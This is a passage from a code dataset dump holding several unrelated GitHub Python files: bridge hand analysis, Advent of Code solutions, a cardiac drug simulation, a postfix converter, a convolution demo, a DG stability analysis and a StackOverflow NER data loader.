[(e+w)/2 for e, w in zip(tricks[10:15], tricks[15:20])]\n TNTricks.append(max(NS) + max(EW))\n return TNTricks\n\ndef computeTotalTrumps(results):\n TNTrumps = []\n for result in results:\n hands = result['deal'].split()\n distributions = []\n for hand in hands:\n distributions.append([len(suit) for suit in hand.split('.')])\n NS = [n+s for n, s in zip(distributions[0], distributions[2])]\n EW = [e+w for e, w in zip(distributions[1], distributions[3])]\n TNTrumps.append(max(NS) + max(EW))\n return TNTrumps\n\n \ndef checkFilesForDoubleDummyInformation(pattern):\n listOfFiles = glob.glob(pattern)\n listOfFiles.sort()\n for fileName in listOfFiles:\n if not hasDoubleDummyAnalysis(fileName):\n year = fileName[8:12]\n month_idx = int(fileName[12:14])\n month = calendar.month_name[month_idx]\n day = fileName[14:16]\n print(f\"No double dummy analysis: {day} {month} {year} \")\n\ndef examinePointsFor_4S(pattern):\n def HCPs(hand):\n pts = 0\n for suit in hand:\n if 'A' in suit: pts += 4\n if 'K' in suit: pts += 3\n if 'Q' in suit: pts += 2\n if 'J' in suit: pts += 1\n return pts\n def distribution(hand):\n suitLengths = []\n for suit in hand:\n suitLengths.append(len(suit))\n return suitLengths\n\n listOfFiles = glob.glob(pattern)\n listOfFiles.sort()\n columns = ['ns_pts','ns_tricks','ns_trumps','ew_pts','ew_tricks','ew_trumps']\n df = pd.DataFrame(columns=columns)\n def best(d):\n biggest = 0\n big_d = {}\n for key in d:\n if d[key] > biggest: \n biggest = d[key]\n big_d = {key:d[key]}\n return big_d\n \n for fileName in listOfFiles:\n data = 
getData(fileName)\n results = extractData(data)\n for result in results:\n tricks = [int(c, 16) for c in result['tricks']]\n hands = result['deal'].split()\n N = HCPs(hands[0].split(\".\"))\n E = HCPs(hands[1].split(\".\"))\n S = HCPs(hands[2].split(\".\"))\n W = HCPs(hands[3].split(\".\"))\n NS_pts = N + S\n EW_pts = E + W\n tricks = [int(c, 16) for c in result['tricks']] # nt-S-H-D-C\n NS_tricks = {key:(n+s)/2.0 for key,n,s in zip([\"NT\",\"S\",\"H\",\"D\",\"C\"], tricks[0:5], tricks[5:10])}\n EW_tricks = {key:(e+w)/2.0 for key,e,w in zip([\"NT\",\"S\",\"H\",\"D\",\"C\"], tricks[10:15], tricks[15:20])}\n N = distribution(hands[0].split(\".\"))\n E = distribution(hands[1].split(\".\"))\n S = distribution(hands[2].split(\".\"))\n W = distribution(hands[3].split(\".\"))\n NS_trumps = {key:n+s for key,n,s in zip([\"S\",\"H\",\"D\",\"C\"],N,S)}\n EW_trumps = {key:e+w for key,e,w in zip([\"S\",\"H\",\"D\",\"C\"],E,W)}\n best_ns_tricks = best(NS_tricks)\n best_ew_tricks = best(EW_tricks)\n ns_tricks = list(best_ns_tricks.values())[0]\n ew_tricks = list(best_ew_tricks.values())[0]\n ns_suit = list(best_ns_tricks.keys())[0]\n ew_suit = list(best_ew_tricks.keys())[0]\n# print(f\"NS: tricks={ns_tricks}, trumps={NS_trumps[ns_suit]}, HCPs={NS_pts}\")\n# print(f\"EW: tricks={ew_tricks}, trumps={EW_trumps[ew_suit]}, HCPs={EW_pts}\")\n # columns = ['ns_pts','ns_tricks','ew_trumps','ew_pts','ew_tricks','ew_trumps']\n ns_trumps = 0 if ns_suit == \"NT\" else NS_trumps[ns_suit]\n ew_trumps = 0 if ew_suit == \"NT\" else EW_trumps[ew_suit]\n row = {k:v for k,v in zip(columns, [NS_pts, ns_tricks, ns_trumps, EW_pts, ew_tricks, ew_trumps])}\n df = df.append(row, ignore_index=True)\n\n return df\n\ndef showLAW(pattern):\n listOfFiles = glob.glob(pattern)\n listOfFiles.sort()\n allDifferences = []\n \n for fileName in listOfFiles:\n data = getData(fileName)\n results = extractData(data)\n totalTricks = computeTotalTricks(results)\n totalTrumps = computeTotalTrumps(results) \n differences = [tricks-trumps for tricks, trumps in zip(totalTricks, totalTrumps)]\n\n for i, difference in enumerate(differences):\n # if difference <= -10 then the data has been uploaded incorrectly and should be ignored\n if (difference < -2.5 and difference > -10) or (difference > 2.5): \n year = fileName[8:12]\n month_idx = int(fileName[12:14])\n month = calendar.month_name[month_idx]\n day = fileName[14:16]\n tricks = totalTricks[i]\n trumps = totalTrumps[i]\n mismatch = tricks - trumps\n print(f\"Board {i+1:2} has LAW: {tricks:4.1f}-{trumps:2}={mismatch:4.1f}, {day} {month} {year}\") \n allDifferences.extend(differences)\n \n # remove data that has been posted incorrectly\n allDifferences = [d for d in allDifferences if d > -10]\n\n # determine frequencies\n allDifferences.sort()\n counts = Counter(allDifferences)\n numberOfHands = len(allDifferences)\n print(f\"No of hands = {numberOfHands}\")\n\n # print frequencies as percentages\n for key in counts:\n print(\"TNT mismatch: {:6.1f} {:6.1f}\".format(key, counts[key]*100/numberOfHands))\n\n # plot results\n _, ax = plt.subplots()\n ax.bar(range(len(allDifferences)), allDifferences)\n plt.grid(True)\n plt.show()\n\nif __name__ == \"__main__\":\n os.chdir(\"results\")\n pattern = r\"laneend*\"\n checkFilesForDoubleDummyInformation(pattern)\n z = examinePointsFor_4S(pattern)\n print(z)\n# 
showLAW(pattern)\n","repo_name":"seddon-software/bridge","sub_path":"DoubleDummyAnalysis/analysePbnResults2.py","file_name":"analysePbnResults2.py","file_ext":"py","file_size_in_byte":7261,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"5314486827","text":"\ndef parse_strategy_guide(strategy_guide):\n return [\n tuple(line.split()) \n for line in strategy_guide.strip().split('\\n')\n ]\n\ndef get_total_player_score(strategy_guide):\n rounds = parse_strategy_guide(strategy_guide)\n scores = [\n RockPaperScissorsRound(_round[0], _round[1]).get_player_score()\n for _round in rounds \n ]\n\n return sum(scores)\n\nclass RockPaperScissorsRound:\n shape_scores = {\n 'A': 1,\n 'X': 0,\n 'B': 2,\n 'Y': 3,\n 'C': 3,\n 'Z': 6\n }\n\n rules = {\n 'A': 'C',\n 'B': 'A',\n 'C': 'B',\n }\n\n rule_complement = {\n 'C': 'A',\n 'A': 'B',\n 'B': 'C'\n }\n\n def __init__(self, opponent_choice, outcome):\n self.opponent_choice = opponent_choice\n self.outcome = outcome\n\n def get_player_score(self):\n score = 0\n player_choice = None\n\n if self.outcome == 'X':\n player_choice = self.rules[self.opponent_choice]\n if self.outcome == 'Y':\n player_choice = self.opponent_choice\n if self.outcome == 'Z':\n player_choice = self.rule_complement[self.opponent_choice]\n\n return self.shape_scores[player_choice] + self.shape_scores[self.outcome]\n\n def get_opponent_score(self):\n score = 0\n\n if self.rules[self.opponent_choice] == self.player_choice:\n score += 6\n elif self.rules[self.player_choice] == self.opponent_choice:\n pass\n else:\n score += 3\n\n score += self.shape_scores[self.opponent_choice]\n return score \n\nif __name__ == \"__main__\":\n f = open(\"test_input\", \"r\")\n strategy_guide = f.read()\n f.close()\n print(get_total_player_score(strategy_guide))\n","repo_name":"braedon2/AdventOfCode2022","sub_path":"day2/day2.py","file_name":"day2.py","file_ext":"py","file_size_in_byte":1769,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"32054891754","text":"import numpy as np\nimport io\nimport argparse\n\ndef main():\n parser = argparse.ArgumentParser()\n parser.add_argument(\"--test\", action=\"store_true\")\n parser.add_argument(\"--verbose\", action=\"store_true\")\n\n args, _ = parser.parse_known_args()\n test = args.test\n verbose = args.verbose\n\n if test:\n infile = \"test_input\"\n else:\n infile = \"input\"\n \n with open(infile, \"r\") as f:\n lines = f.readlines()\n \n signals = []\n outputs = []\n len_to_digit = {\n 2: 1,\n 3: 7,\n 4: 4,\n 7: 8,\n }\n num_unique = 0\n for line in lines:\n signal = [s.strip() for s in line.split(\"|\")[0].split(\" \") if s != \"\"]\n output = [s.strip() for s in line.split(\"|\")[1].split(\" \") if s != \"\"]\n signals.append(signal)\n outputs.append(output)\n\n # for s in signal:\n # if len(s) in len_to_digit.keys():\n # num_unique += 1\n # print(s, end=\" \")\n for o in output:\n if len(o) in len_to_digit.keys():\n num_unique += 1\n if verbose:\n print(o, end=\" \")\n if verbose:\n print(\"\")\n \n print(num_unique)\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"stevenstetzler/advent-of-code-2021","sub_path":"day_8/solution_15.py","file_name":"solution_15.py","file_ext":"py","file_size_in_byte":1253,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"10595626573","text":"import ORdmm_Land_em_coupling as model\nfrom scipy.integrate import odeint\nimport numpy as 
np\nimport matplotlib.pyplot as plt\nimport tqdm\nimport sys\n\nfrom drug_values import drug_dict\n\nnum_beats = 100\ntsteps = np.arange(0.0, 1000.0, 0.1) # real run 1000\npop_size = 1000\n\ndef run_population_drug(mech_type, hf_type, drug_type, part, cell_type='endo'):\n \"\"\"Run the population model with different drugs.\n \"\"\"\n # load random sampling values\n rand_val = np.load(f'init_pop/rand_sample_iso_control.npy')\n # load specific population\n y0s = np.load(f'init_pop/population_{mech_type}_{hf_type}.npy') \n # list for new population\n population_drug = []\n\n part_dict = {'1': [0,200], '2': [200,400], '3': [400,600], '4': [600,800], '5': [800,1000]}\n\n for i in range(part_dict[part][0], part_dict[part][1]):\n print(i)\n y0 = y0s[i]\n\n parameters = model.init_parameter_values(\n celltype=0 if cell_type == \"endo\" else 1 if cell_type == \"epi\" else 2,\n isometric=1 if mech_type=='iso' else 0,\n lmbda_set=1,\n #mechanical parameters\n ku_rate=rand_val[i][0],\n kuw_rate=rand_val[i][1],\n kws_rate=rand_val[i][2],\n ktrpn_rate=rand_val[i][3],\n Trpn50_rate=rand_val[i][4],\n gammaw_rate=rand_val[i][5],\n gammas_rate=rand_val[i][6],\n rs_rate=rand_val[i][7],\n rw_rate=rand_val[i][8],\n Tref_rate=rand_val[i][9],\n cat50ref_rate=rand_val[i][10],\n ntm_rate=rand_val[i][11],\n #HF parameters\n GNaL_rate=1.80 if hf_type=='gomez' else 1,\n Gto_rate=0.40 if hf_type=='gomez' else 1,\n GK1_rate=0.68 if hf_type=='gomez' else 1,\n Gncx_rate=1.750 if hf_type=='gomez' else 1,\n Jleak_rate=1.30 if hf_type=='gomez' else 1,\n Jserca_rate=0.5 if hf_type=='gomez' else 1,\n CaMKa_rate=1.50 if hf_type=='gomez' else 1,\n Pnak_rate=0.70 if hf_type=='gomez' else 1,\n Pnab_rate=1,\n Pcab_rate=1,\n thl_rate=1.80 if hf_type=='gomez' else 1,\n Jrel_inf_sensitivity=0.80 if hf_type=='gomez' else 1,\n Jrel_infp_sensitivity=0.80 if hf_type=='gomez' else 1,\n # drug parameters\n drug_INa=drug_dict[drug_type]['drug_INa'],\n IC50_INa=drug_dict[drug_type]['IC50_INa'],\n h_INa=drug_dict[drug_type]['h_INa'],\n drug_IKr=drug_dict[drug_type]['drug_IKr'],\n IC50_IKr=drug_dict[drug_type]['IC50_IKr'],\n h_IKr=drug_dict[drug_type]['h_IKr'],\n drug_ICaL=drug_dict[drug_type]['drug_ICaL'],\n IC50_ICaL=drug_dict[drug_type]['IC50_ICaL'],\n h_ICaL=drug_dict[drug_type]['h_ICaL'],\n drug_INaL=drug_dict[drug_type]['drug_INaL'],\n IC50_INaL=drug_dict[drug_type]['IC50_INaL'],\n h_INaL=drug_dict[drug_type]['h_INaL'],\n drug_IKs=drug_dict[drug_type]['drug_IKs'],\n IC50_IKs=drug_dict[drug_type]['IC50_IKs'],\n h_IKs=drug_dict[drug_type]['h_IKs'],\n drug_Ito=drug_dict[drug_type]['drug_Ito'],\n IC50_Ito=drug_dict[drug_type]['IC50_Ito'],\n h_Ito=drug_dict[drug_type]['h_Ito'],\n drug_IK1=drug_dict[drug_type]['drug_IK1'],\n IC50_IK1=drug_dict[drug_type]['IC50_IK1'],\n h_IK1=drug_dict[drug_type]['h_IK1'],\n )\n\n for n in tqdm.tqdm(range(num_beats)):\n y = odeint(model.rhs, y0, tsteps, args=(parameters,))\n y0 = y[-1]\n \n population_drug.append(y0)\n \n np.save(f'init_pop_drug/population_{mech_type}_{hf_type}_{drug_type}_{part}.npy', population_drug, allow_pickle=True) \n\n\n\n\nif __name__ == \"__main__\":\n\n mech = sys.argv[1]\n hf = sys.argv[2]\n drug = sys.argv[3]\n partition = sys.argv[4]\n\n run_population_drug(mech_type=mech, hf_type=hf, drug_type=drug, part=partition)\n\n\n\n\n \n\n\n","repo_name":"abraaum/master_project","sub_path":"Python/population_drug.py","file_name":"population_drug.py","file_ext":"py","file_size_in_byte":3969,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} 
+{"seq_id":"32108855838","text":"class Stack:\n def __init__(self):\n self.stack = []\n\n def add(self, dataval):\n self.stack.append(dataval)\n # Use list append method to add element\n # if dataval not in self.stack:\n # self.stack.append(dataval)\n # return True\n # else:\n # return False\n # Use peek to look at the top of the stack\n\n def peek(self):\n return self.stack[-1]\n\n # look element all\n def __str__(self):\n return \"ข้อมูล : {} จำนวนข้อมูล : {}\".format(self.stack, len(self.stack))\n\n # remove element top\n def remove(self):\n if len(self.stack) <= 0:\n return (\"No element in the Stack\")\n else:\n return self.stack.pop()\n\n def lengthStack(self):\n return len(self.stack)\nif __name__ == '__main__':\n \n stack = Stack()\n String = \"a-(b+c*d)/e\"\n postfix = \"\"\n # if 'a' in \"+-/%)*(\":\n # print(\"True\")\n # else:\n # print(\"False\")\n for ch in String:\n if ch not in \"+-/%)*(\":\n postfix += ch\n elif ch == '(':\n stack.add(ch)\n elif ch == ')':\n while stack.peek() != '(':\n postfix += stack.peek()\n stack.remove()\n stack.remove()\n else:\n stack.add(ch)\n while(stack.lengthStack() != 0):\n postfix += stack.peek()\n stack.remove()\n print(postfix)\n\n","repo_name":"sekkarin/python-datastuctue-and-algorittm","sub_path":"Stack/Stack.py","file_name":"Stack.py","file_ext":"py","file_size_in_byte":1456,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"29665241076","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Feb 24 00:15:32 2023\n\n@author: ken3\n\nIntroduction\n \n\"\"\"\n\nimport numpy as np\n\ndef convolve(x, h):\n \"\"\"\n Computes the convolution of two sequences x and h.\n \"\"\"\n N = len(x)\n M = len(h)\n y = np.zeros(N+M-1)\n for n in range(N+M-1):\n for k in range(max(0, n-M+1), min(N, n+1)):\n y[n] += x[k] * h[n-k]\n return y\n\nx = np.array([1, 2, 3])\nh = np.array([1, 1, 1])\ny = convolve(x, h)\nprint(y)","repo_name":"sou350121/probability-Statistics-Introduction-and-Visualization","sub_path":"convolution.py","file_name":"convolution.py","file_ext":"py","file_size_in_byte":469,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"68"} +{"seq_id":"20394694079","text":"# Fourier stability analysis of RKDG scheme\nimport numpy as np\nfrom numpy.linalg import eigvals\nimport argparse\nfrom basis import *\n\n# Get arguments\nparser = argparse.ArgumentParser()\nparser.add_argument('-degree', type=int, help='Degree', required=True)\nparser.add_argument('-cfl_min', type=float, help='Min cfl', default=0.0)\nparser.add_argument('-cfl_max', type=float, help='Max cfl', default=1.0)\nparser.add_argument('-scheme',\n choices=('fe','ssprk22','ssprk33','ssprk43','ssprk54','rk4'),\n help='Time scheme', required=True)\nargs = parser.parse_args()\n\nk = args.degree # degree\nNq = k + 1 # number of quadrature points\nnd = k + 1 # number of dofs\n\n# QGauss position and weights\nxg, wg = np.polynomial.legendre.leggauss(Nq)\n\n# Construct Vandermonde matrix for gauss points\nVf = np.zeros((Nq,nd))\nVg = np.zeros((Nq,nd))\nfor i in range(Nq):\n for j in range(nd):\n Vf[i,j] = shape_value(j, xg[i])\n Vg[i,j] = shape_grad (j, xg[i])\n\n# Identity\nI = np.eye(nd)\n\ndef amplification_matrix(scheme, nu, C):\n if scheme == 'fe':\n H = I + nu*C\n elif scheme == 'ssprk22':\n G = I + nu*C\n H = 0.5*(I + G@G)\n elif scheme == 'ssprk33':\n G = I + nu*C\n H = (1.0/3.0)*I + (1.0/2.0)*G + (1.0/6.0)*(G@G@G)\n elif scheme == 'ssprk43':\n G = I + 0.5*nu*C\n H = (2.0/3.0)*G + 
(1.0/3.0)*G@G@G@G\n elif scheme == 'ssprk54':\n c11 = 0.391752226571890\n\n c21 = 0.444370493651235\n c22 = 1.0 - c21\n c23 = 0.368410593050371\n\n c31 = 0.620101851488403\n c32 = 1.0 - c31\n c33 = 0.251891774271694\n\n c41 = 0.178079954393132\n c42 = 1.0 - c41\n c43 = 0.544974750228521\n\n c51 = 0.517231671970585\n c52 = 0.096059710526147\n c53 = 1.0 - (c51 + c52)\n c54 = 0.063692468666290\n c55 = 0.226007483236906\n\n G1 = I + c11*nu*C\n G2 = c21*I + (c22*I + c23*nu*C) @ G1\n G3 = c31*I + (c32*I + c33*nu*C) @ G2\n G4 = c41*I + (c42*I + c43*nu*C) @ G3\n G5 = c52*I + c54*nu*C\n G6 = c53*I + c55*nu*C\n\n H = c51*G2 + G5@G3 + G6@G4\n elif scheme == 'rk4':\n G1 = nu*C\n G2 = G1 + 0.5*G1@G1\n G3 = G1 + 0.5*G1@G2\n G4 = G1 + G1@G3\n H = I + (1.0/6.0)*(G1+G4) + (1.0/3.0)*(G2+G3)\n else:\n print('Unknown time scheme')\n exit()\n return H\n\nM = np.zeros((nd,nd))\nA = np.zeros((nd,nd))\nBm= np.zeros((nd,nd))\nBp= np.zeros((nd,nd))\nfor i in range(nd):\n for j in range(nd):\n Bm[i,j] = shape_value(i,-1.0) * shape_value(j,+1.0)\n Bp[i,j] = shape_value(i,+1.0) * shape_value(j,+1.0)\n for q in range(Nq):\n M[i,j] += 0.5*Vf[q,i]*Vf[q,j]*wg[q]\n A[i,j] += Vg[q,i]*Vf[q,j]*wg[q]\n\nprint(\"M=\",M)\nprint(\"A=\",A)\n\nwavenums = np.linspace(0,2*np.pi,500)\ncfls = np.linspace(args.cfl_min,args.cfl_max,100)\nfor nu in cfls:\n maxeig = 0.0\n for kdx in wavenums:\n C = A + np.exp(-1j*kdx)*Bm - Bp\n H = amplification_matrix(args.scheme, nu, C)\n eig = np.abs(eigvals(H)).max()\n if eig > maxeig:\n maxeig = eig\n print(nu,maxeig)\n if maxeig - 1.0 > 1.0e-12:\n break\n","repo_name":"cpraveen/fem","sub_path":"dg1d/scalar/fourier.py","file_name":"fourier.py","file_ext":"py","file_size_in_byte":3208,"program_lang":"python","lang":"en","doc_type":"code","stars":20,"dataset":"github-code","pt":"68"} +{"seq_id":"2667260520","text":"from __future__ import print_function, division\nimport os\nimport re\nimport codecs\nimport unicodedata\n\nimport model\nimport string\nimport random\nimport numpy as np\n\nimport utils_so as utils #JT: utils for SO\n\nfrom config_so import parameters\nnp.random.seed(parameters[\"seed\"])\n\n\nfrom utils_so import create_dico, create_mapping, zero_digits, Merge_Label\nfrom utils_so import iob2, iob_iobes\n\n\n\n\ndef unicodeToAscii(s):\n return ''.join(\n c for c in unicodedata.normalize('NFD', s)\n if unicodedata.category(c) != 'Mn'\n and c in string.ascii_letters + \" .,;'-\"\n )\n\n\ndef load_sentences_so(path, lower, zeros, merge_tag,set_of_selected_tags):\n \"\"\"\n Load sentences. 
A line must contain at least a word and its tag.\n Sentences are separated by empty lines.\n \"\"\"\n count_question=0\n count_answer=0\n\n if merge_tag:\n path=Merge_Label(path)\n sentences = [] #list of sentences\n\n sentence = [] #list of words in the current sentence in formate each word list looks like [word, markdow tag name, mark down tag, NER tag]\n max_len = 0\n for line in open(path):\n if line.startswith(\"Question_ID\"):\n count_question+=1\n\n if line.startswith(\"Answer_to_Question_ID\"):\n count_answer+=1\n\n if line.strip()==\"\":\n if len(sentence) > 0:\n #print(sentence)\n output_line = \" \".join(w[0] for w in sentence)\n #print(output_line)\n if \"code omitted for annotation\" in output_line and \"CODE_BLOCK :\" in output_line:\n sentence = []\n continue\n elif \"omitted for annotation\" in output_line and \"OP_BLOCK :\" in output_line:\n sentence = []\n continue\n elif \"Question_URL :\" in output_line:\n sentence = []\n continue\n elif \"Question_ID :\" in output_line:\n sentence = []\n continue\n else:\n #print(output_line)\n sentences.append(sentence)\n if len(sentence)>max_len:\n max_len=len(sentence)\n sentence=[]\n \n \n\n else:\n line_values=line.strip().split()\n\n gold_word=line_values[0]\n gold_label=line_values[1]\n raw_word=line_values[2]\n raw_label=line_values[3]\n\n \n\n gold_word=\" \".join(gold_word.split('-----'))\n \n\n\n gold_label_name= gold_label.replace(\"B-\",\"\").replace(\"I-\",\"\")\n if gold_label_name not in set_of_selected_tags:\n gold_label=\"O\"\n\n if parameters['segmentation_only']:\n if gold_label!=\"O\":\n # print(gold_label)\n gold_label_prefix=gold_label.split(\"-\")[0]\n gold_label=gold_label_prefix+\"-\"+\"Name\"\n # print(gold_label)\n # print(\"updated gold label\")\n\n \n\n \n raw_label_name=raw_label.replace(\"B-\",\"\").replace(\"I-\",\"\")\n \n word_info=[gold_word, raw_label_name, raw_label, gold_label]\n \n sentence.append(word_info)\n\n print(\"------------------------------------------------------------\")\n print(\"Number of questions in \", path, \" : \", count_question)\n print(\"Number of answers in \", path, \" : \", count_answer)\n print(\"Number of sentences in \", path, \" : \", len(sentences))\n print(\"Max len sentences has\", max_len, \"words\")\n print(\"------------------------------------------------------------\")\n return sentences\n \ndef load_sentences_so_w_pred(path_main_file, path_segmenter_pred_file, lower, zeros, merge_tag,set_of_selected_tags):\n \"\"\"\n Load sentences. 
A line must contain at least a word and its tag.\n Sentences are separated by empty lines.\n \"\"\"\n count_question=0\n count_answer=0\n max_len = 0\n\n if merge_tag:\n path=Merge_Label(path_main_file)\n sentences = [] #list of sentences\n\n sentence = [] #list of words in the current sentence in formate each word list looks like [word, markdow tag name, mark down tag, NER tag]\n\n for line in open(path):\n if line.startswith(\"Question_ID\"):\n count_question+=1\n\n if line.startswith(\"Answer_to_Question_ID\"):\n count_answer+=1\n\n if line.strip()==\"\":\n if len(sentence) > 0:\n #print(sentence)\n output_line = \" \".join(w[0] for w in sentence)\n #print(output_line)\n if \"code omitted for annotation\" in output_line and \"CODE_BLOCK :\" in output_line:\n sentence = []\n continue\n elif \"omitted for annotation\" in output_line and \"OP_BLOCK :\" in output_line:\n sentence = []\n continue\n elif \"Question_URL :\" in output_line:\n sentence = []\n continue\n elif \"Question_ID :\" in output_line:\n sentence = []\n continue\n else:\n #print(output_line)\n sentences.append(sentence)\n if len(sentence)>max_len:\n max_len=len(sentence)\n sentence=[]\n \n \n\n else:\n line_values=line.strip().split()\n\n gold_word=line_values[0]\n gold_label=line_values[1]\n raw_word=line_values[2]\n raw_label=line_values[3]\n\n \n\n gold_word=\" \".join(gold_word.split('-----'))\n \n\n\n gold_label_name= gold_label.replace(\"B-\",\"\").replace(\"I-\",\"\")\n if gold_label_name not in set_of_selected_tags:\n gold_label=\"O\"\n\n if parameters['segmentation_only']:\n if gold_label!=\"O\":\n # print(gold_label)\n gold_label_prefix=gold_label.split(\"-\")[0]\n gold_label=gold_label_prefix+\"-\"+\"Name\"\n # print(gold_label)\n # print(\"updated gold label\")\n\n \n\n \n raw_label_name=raw_label.replace(\"B-\",\"\").replace(\"I-\",\"\")\n \n word_info=[gold_word, raw_label_name, raw_label, gold_label]\n \n sentence.append(word_info)\n\n \n\n\n sentences_preds = []\n sentence_pred = []\n \n for line in open(path_segmenter_pred_file):\n if line.strip()==\"\":\n if len(sentence_pred) > 0:\n sentences_preds.append(sentence_pred)\n sentence_pred=[]\n else:\n line_values=line.strip().split()\n pred_word= ' '.join(line_values[:-2])\n pred_label=line_values[-1]\n\n word_info=[pred_word, pred_label]\n sentence_pred.append(word_info)\n\n # print(len(sentences_preds),len(sentences))\n\n \n\n\n\n pred_merged_sentences = []\n for sent_index in range(len(sentences)):\n main_sent = sentences[sent_index]\n pred_sent = sentences_preds[sent_index]\n \n\n new_sent = []\n new_word_info =[]\n\n for word_index in range(len(main_sent)):\n [gold_word, raw_label_name, raw_label, gold_label] = main_sent[word_index]\n [pred_word, pred_seg_label] = pred_sent[word_index]\n \n\n new_word_info = [gold_word, raw_label_name, raw_label, pred_seg_label, gold_label]\n new_sent.append(new_word_info)\n\n if len(new_sent)>0:\n pred_merged_sentences.append(new_sent)\n\n\n\n\n\n print(\"------------------------------------------------------------\")\n print(\"Number of questions in \", path, \" : \", count_question)\n print(\"Number of answers in \", path, \" : \", count_answer)\n print(\"Number of sentences in \", path, \" : \", len(sentences))\n print(\"Number of sentences after merging : \" , len(pred_merged_sentences))\n print(\"Max len sentences has\", max_len, \"words\")\n print(\"------------------------------------------------------------\")\n return pred_merged_sentences\n \n\n\ndef load_sentences_conll(path, lower, zeros):\n \"\"\"\n Load 
sentences. A line must contain at least a word and its tag.\n Sentences are separated by empty lines.\n \"\"\"\n sentences = []\n sentence = []\n for line in codecs.open(path, 'r', 'utf-8'):\n line = zero_digits(line.rstrip()) if zeros else line.rstrip()\n if not line:\n if len(sentence) > 0:\n if 'DOCSTART' not in sentence[0][0]:\n sentences.append(sentence)\n sentence = []\n else:\n word = line.split()\n assert len(word) >= 2\n sentence.append(word)\n if len(sentence) > 0:\n if 'DOCSTART' not in sentence[0][0]:\n sentences.append(sentence)\n return sentences\n\n\ndef update_tag_scheme(sentences, tag_scheme):\n \"\"\"\n Check and update sentences tagging scheme to IOB2.\n Only IOB1 and IOB2 schemes are accepted.\n \"\"\"\n\n for i, s in enumerate(sentences):\n tags = [w[-1] for w in s]\n #print(\"prev tags: \",tags)\n # Check that tags are given in the IOB format\n if not iob2(tags):\n s_str = '\\n'.join(' '.join(w) for w in s)\n raise Exception('Sentences should be given in IOB format! ' +\n 'Please check sentence %i:\\n%s' % (i, s_str))\n if tag_scheme == 'iob':\n # If format was IOB1, we convert to IOB2\n for word, new_tag in zip(s, tags):\n word[-1] = new_tag\n elif tag_scheme == 'iobes':\n new_tags = iob_iobes(tags)\n for word, new_tag in zip(s, new_tags):\n word[-1] = new_tag\n\n else:\n raise Exception('Unknown tagging scheme!')\n # tags = [w[-1] for w in s]\n # print(\"new tags: \",tags)\n\n\n\ndef word_mapping(sentences, lower):\n \"\"\"\n Create a dictionary and a mapping of words, sorted by frequency.\n \"\"\"\n words = [[x[0].lower() if lower else x[0] for x in s] for s in sentences]\n dico = create_dico(words) #dict with word frequency\n # print(dico)\n\n dico[''] = 10000001\n dico[''] = 10000000\n dico = {k:v for k,v in dico.items() if v>=3} #prune words which has occureced less than 3 times\n word_to_id, id_to_word = create_mapping(dico)\n\n print(\"Found %i unique words (%i in total)\" % (\n len(dico), sum(len(x) for x in words)\n ))\n\n return dico, word_to_id, id_to_word\n\n\ndef char_mapping(sentences):\n \"\"\"\n Create a dictionary and mapping of characters, sorted by frequency.\n \"\"\"\n chars = [\"\".join([w[0] for w in s]) for s in sentences]\n dico = create_dico(chars)\n dico[''] = 10000000\n # dico[';'] = 0\n char_to_id, id_to_char = create_mapping(dico)\n print(\"Found %i unique characters\" % len(dico))\n return dico, char_to_id, id_to_char\n\n\ndef tag_mapping(sentences):\n \"\"\"\n Create a dictionary and a mapping of tags, sorted by frequency.\n \"\"\"\n tags = [[word[-1] for word in s] for s in sentences]\n dico = create_dico(tags)\n dico[model.START_TAG] = -1\n dico[model.STOP_TAG] = -2\n tag_to_id, id_to_tag = create_mapping(dico)\n print(\"Found %i unique named entity tags\" % len(dico))\n # print(dico)\n return dico, tag_to_id, id_to_tag\n\ndef cap_feature(s):\n \"\"\"\n Capitalization feature:\n 0 = low caps\n 1 = all caps\n 2 = first letter caps\n 3 = one capital (not first letter)\n \"\"\"\n if s.lower() == s:\n return 0\n elif s.upper() == s:\n return 1\n elif s[0].upper() == s[0]:\n return 2\n else:\n return 3\n\n\ndef hand_features_to_idx(sentences):\n hand_to_idx = []\n count = 0\n for s in sentences:\n hand_to_idx.append(list(range(count, count + len(s))))\n count += len(s)\n\n return(hand_to_idx)\n\n\n\ndef prepare_sentence(str_words, word_to_id, char_to_id, lower=False):\n \"\"\"\n Prepare a sentence for evaluation.\n \"\"\"\n def f(x): return x.lower() if lower else x\n words = [word_to_id[f(w) if f(w) in word_to_id else '']\n for w in 
str_words]\n chars = [[char_to_id[c] for c in w if c in char_to_id]\n for w in str_words]\n caps = [cap_feature(w) for w in str_words]\n return {\n 'str_words': str_words,\n 'words': words,\n 'chars': chars,\n 'caps': caps\n }\n\ndef seg_pred_to_idx(sentence):\n # print(type(sentence))\n seg_pred_ids = []\n for word_iter in range(len(sentence)):\n word_info=sentence[word_iter]\n raw_label=word_info[-2]\n if raw_label[0]=='O':\n seg_pred_ids.append(0)\n else:\n seg_pred_ids.append(1)\n return seg_pred_ids\n\n\ndef seg_pred_to_idx_prev(sentence):\n \n seg_pred_ids = []\n for word_iter in range(len(sentence)):\n word_info=sentence[word_iter]\n pred_label=word_info[-1]\n\n if pred_label=='O':\n seg_pred_ids.append(0)\n else:\n seg_pred_ids.append(1)\n # elif pred_label.startswith(\"B\"):\n # code_pred_ids.append(1)\n # elif pred_label.startswith(\"I\"):\n # code_pred_ids.append(2)\n\n return seg_pred_ids\n\n\ndef ctc_pred_to_idx(sentence, ctc_pred_dict):\n \n ctc_pred_ids = []\n for word_iter in range(len(sentence)):\n word =sentence[word_iter][0]\n if word in ctc_pred_dict:\n ctc_pred_ids.append(int(ctc_pred_dict[word]))\n else:\n ctc_pred_ids.append(0)\n\n # print(ctc_pred_ids)\n return ctc_pred_ids\n\ndef ner_pred_to_idx(sentence, tag_to_id):\n \n ner_pred_ids = []\n for word_iter in range(len(sentence)):\n word_info=sentence[word_iter]\n pred_label=word_info[3]\n\n pred_label_id = tag_to_id[pred_label]\n ner_pred_ids.append(pred_label_id)\n\n return ner_pred_ids\n\n\ndef 